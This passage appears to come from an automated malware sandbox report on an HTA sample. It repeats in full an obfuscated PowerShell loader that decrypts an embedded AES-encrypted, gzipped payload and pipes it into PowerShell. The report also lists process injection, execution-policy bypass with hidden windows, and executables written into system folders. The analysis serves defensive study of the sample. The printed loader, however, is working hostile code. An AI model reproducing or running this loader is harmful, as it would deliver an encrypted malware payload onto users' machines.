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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf \| powershell - }
parent_process	powershell.exe	martian_process	"C:\Windows\system32\cmd.exe" /c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf \| powershell -
parent_process	powershell.exe	martian_process	C:\Windows\System32\cmd.exe /c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf \| powershell -

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3060 resumed a thread in remote process 2228
NtResumeThread July 25, 2023, 10:35 a.m.	thread_handle: 0x0000000000000360 suspend_count: 1 process_identifier: 2228	1	0	0

Creates a suspicious Powershell process (4 events)

option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (19 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

HHYGASDBBBX.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All